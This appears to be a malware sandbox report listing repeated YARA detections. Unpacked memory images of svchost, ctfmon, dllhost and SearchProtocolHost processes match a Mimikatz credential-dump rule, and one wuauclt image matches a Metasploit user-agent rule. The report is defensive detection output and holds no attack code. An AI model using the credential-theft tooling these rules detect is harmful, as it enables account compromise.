      Source: 32.2.ctfmon.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.9a2c68.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.45.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.29.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.787468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.50.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.2.wuauclt.exe.14eb928.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.820000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.27.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.4e0000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.59.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e37468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.52.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.522c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.23.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b77268.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b82a68.6.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.522c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8e2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.8.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2897468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.11.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8d7468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.12.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e37468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.9a2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.522c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fd7468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.57b7468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
